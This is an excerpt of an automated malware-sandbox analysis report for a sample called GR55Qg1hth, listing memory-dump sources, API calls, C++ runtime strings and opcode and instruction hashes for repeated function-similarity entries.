                                                                    • Instruction Fuzzy Hash: 3841F4B2F1664BB1FF119B62E5583BD66A19B64BC4F4C8031DE4C6B786EE2CD485C380
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$strlen
                                                                    • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::insert$basic_string::replace
                                                                    • API String ID: 2619041689-3628603605
                                                                    • Opcode ID: 99168f70d61b67b2de2e857ca410546fd1f79683870880369f4542f5b3ce907c
                                                                    • Instruction ID: abba8c671cef64d420427954f72a9ccc3119394eedb19d480a6e791311d69a4d
                                                                    • Opcode Fuzzy Hash: 99168f70d61b67b2de2e857ca410546fd1f79683870880369f4542f5b3ce907c
                                                                    • Instruction Fuzzy Hash: E041F3B6A0AA87F1EA10EB66D8105A92760FB15BC8F884036ED4DB7755FE7CD186C700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append
                                                                    • API String ID: 3510742995-4063909124
                                                                    • Opcode ID: 41efe5dd4391930a206dfae007c65cfe8c29c96a2af1e7eb0a70ae8c621f8b0a
                                                                    • Instruction ID: 0eb28cf6509c29e651496bd717f442f7adf977cd12dc2af759ea76e5f91a907e
                                                                    • Opcode Fuzzy Hash: 41efe5dd4391930a206dfae007c65cfe8c29c96a2af1e7eb0a70ae8c621f8b0a
                                                                    • Instruction Fuzzy Hash: B7418CB2A08A97F0EF10DF59D5448B92B64EB55BC4B8C4532DE9DA73A1EE3CE541C700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append
                                                                    • API String ID: 3510742995-4063909124
                                                                    • Opcode ID: efbb5c11acff5310940aeacb30acc04531e8b3b51880a9f544812ed8c56a0b65
                                                                    • Instruction ID: bca383f1475a96bbd8677d3b21990effff6c9d9957aa562572a018ced071b63c
                                                                    • Opcode Fuzzy Hash: efbb5c11acff5310940aeacb30acc04531e8b3b51880a9f544812ed8c56a0b65
                                                                    • Instruction Fuzzy Hash: 154114B3B08A8BB0DA11DB2AD9585792B60FB55BC8F8C4432DE9DE7391EE2DD041C700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_replace_aux$basic_string::insert
                                                                    • API String ID: 2221118986-1339558951
                                                                    • Opcode ID: 1b1e9a7c13e4371a6f99a1f96264c427d9cc7de04fb812ce63d0c43e70b6199d
                                                                    • Instruction ID: 78d07f6d8aa90f378ab40b06136050b9c4e4bed0894afd2462efc7deafd248a9
                                                                    • Opcode Fuzzy Hash: 1b1e9a7c13e4371a6f99a1f96264c427d9cc7de04fb812ce63d0c43e70b6199d
                                                                    • Instruction Fuzzy Hash: 4D310436F09A87B1E620EB56DA418AD2750AB49FE8F8C4531DF5CA3791ED38E581C340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$wcslen
                                                                    • String ID: basic_string::append
                                                                    • API String ID: 1844840824-3811946249
                                                                    • Opcode ID: 9347f17a43babf017c691793bdb38873d863690a681ec80374466aafa5876449
                                                                    • Instruction ID: e04576b8d667bda09b217059611c62c6ffc45f79ec72ccf915bb2aaf2db9cb4f
                                                                    • Opcode Fuzzy Hash: 9347f17a43babf017c691793bdb38873d863690a681ec80374466aafa5876449
                                                                    • Instruction Fuzzy Hash: 1731A07AB08A47A0DA10DB16C9885BE2761FB55BC8B8C8532DE5D9B3E4EE3CD580C305
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: malloc
                                                                    • String ID: basic_string::_M_create
                                                                    • API String ID: 2803490479-3122258987
                                                                    • Opcode ID: ae9a775b11c6fc9c2e092fe1f7e484b2d7502b17d7c9ee104dd07d8454008299
                                                                    • Instruction ID: 3e41df451ff8e978b7bc52f3a951a1639a6fe4bcdaf0b14b363b1a4981e170fc
                                                                    • Opcode Fuzzy Hash: ae9a775b11c6fc9c2e092fe1f7e484b2d7502b17d7c9ee104dd07d8454008299
                                                                    • Instruction Fuzzy Hash: 8B210835B06747A5FE589766A6113B826909F487A0F9C0634CE7D9B3C6EF3CE185C304
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$strlen
                                                                    • String ID: basic_string::append
                                                                    • API String ID: 2619041689-3811946249
                                                                    • Opcode ID: d2326482581d9e514696b934b32d13eed50b3dbd77951243f47f78360ed909bf
                                                                    • Instruction ID: cb7f2b5be35fbb3ffb2b625a97f7d3075cbdd6f13eab33dd453558b5711a040b
                                                                    • Opcode Fuzzy Hash: d2326482581d9e514696b934b32d13eed50b3dbd77951243f47f78360ed909bf
                                                                    • Instruction Fuzzy Hash: 2D31E3B370CEA7B0DA10DA16D5586793B60EB46BD4F9C4532EEAEA7381DE2CD041C300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: basic_string::_M_create
                                                                    • API String ID: 3510742995-3122258987
                                                                    • Opcode ID: 52dd81f1854489c19ed0bec846985ecada794f828c33243cca3a44cf1c7bc96e
                                                                    • Instruction ID: 97f4b8185dbfa1192c2db69797f78fb625b1e64ad1a975e653d2a5b9dc1851ab
                                                                    • Opcode Fuzzy Hash: 52dd81f1854489c19ed0bec846985ecada794f828c33243cca3a44cf1c7bc96e
                                                                    • Instruction Fuzzy Hash: FD31E073B19983B8E602AE2A860857D3F606B11FC8F5D8072DF9CA7796DE2CD481C340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: basic_string::assign
                                                                    • API String ID: 3510742995-2385367300
                                                                    • Opcode ID: 83a4c7e8fa1582f809345ef99c50e968c923fd71677e0adc4bf882d3cfeb7943
                                                                    • Instruction ID: c105a008b8d54cb449fdb07eceb19927e370c9f92ad9addf308029b28f32b072
                                                                    • Opcode Fuzzy Hash: 83a4c7e8fa1582f809345ef99c50e968c923fd71677e0adc4bf882d3cfeb7943
                                                                    • Instruction Fuzzy Hash: 94318176B09687B0EE159B1687441BD6E95AB4ABD4F8C8536DEACEF391DE3CE440C300
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: Byte$CharLeadMultiWide
                                                                    • String ID:
                                                                    • API String ID: 2561704868-0
                                                                    • Opcode ID: 7f74731e942f046c8e72c35dc8318a084177015f036843bac978168059bb8f22
                                                                    • Instruction ID: c5964d4fcc8522b62b314bebf97477cdd1671585b6ce031b916338506b7e8e4e
                                                                    • Opcode Fuzzy Hash: 7f74731e942f046c8e72c35dc8318a084177015f036843bac978168059bb8f22
                                                                    • Instruction Fuzzy Hash: 1731D672A0C282A6E3608F26B50036D7A98BB81794F5C4235DADCD7BD5DF7DD4848F00
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: Process$AffinityCurrentMask
                                                                    • String ID:
                                                                    • API String ID: 1231390398-0
                                                                    • Opcode ID: d37506894d666c153380770940b84c9797788700fbc4175b5c31bebff735ba34
                                                                    • Instruction ID: 57adf2bab65896f8a5130e594d6558d86b18c3dfa535e0965e5f34ad7a4fc83f
                                                                    • Opcode Fuzzy Hash: d37506894d666c153380770940b84c9797788700fbc4175b5c31bebff735ba34
                                                                    • Instruction Fuzzy Hash: 7F018431A18647A1EAB1572976443BB5B90BF4879CF882836DE4DA7350EE7CD645C300
                                                                    APIs
                                                                    • VirtualProtect.KERNEL32(00007FF65047F098,00007FFE2167ADA0,?,?,?,00000001,00007FF650221261), ref: 00007FF65022E795
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                    • API String ID: 544645111-395989641
                                                                    • Opcode ID: cd9e38df2c18dad77aefb04d397cd5349ebe5920ce9a5eb8afd39514f1ecb972
                                                                    • Instruction ID: df04e5b240e113596a63a3400487a3957e6c52340c8335377c802b326ef8e434
                                                                    • Opcode Fuzzy Hash: cd9e38df2c18dad77aefb04d397cd5349ebe5920ce9a5eb8afd39514f1ecb972
                                                                    • Instruction Fuzzy Hash: 3C61CD76F28683A6EF109F51AD401797BA1BB95B94F1C8231DE6DA7398DE3CE402D700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1972631076.000001B630F60000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001B630F60000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1b630f60000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: CallTranslator
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 3163161869-2084237596
                                                                    • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                    • Instruction ID: 26cea01d075f5f87c5aa44f8b9ba07c9df76bc91e613b3cb3ab01646d8da38b4
                                                                    • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                    • Instruction Fuzzy Hash: 35614A36604B488AEB20DF65D4407DDB7E4F768B88F044219EF4D17BA9DB3AD599C700
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %p not found?!?!
                                                                    • API String ID: 0-11085004
                                                                    • Opcode ID: 177a3ea9713565d27c461e6c38c2e205021ee95a20308655bcdde169218979b4
                                                                    • Instruction ID: bf7b7fb418fc56019f167af32604e046810313f420a619705567d934cde7a676
                                                                    • Opcode Fuzzy Hash: 177a3ea9713565d27c461e6c38c2e205021ee95a20308655bcdde169218979b4
                                                                    • Instruction Fuzzy Hash: 58510936A1AB47A4FE649B1692953F82AA5AF4CB80F4C8035CE4CE67D1DF3CE485C311
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
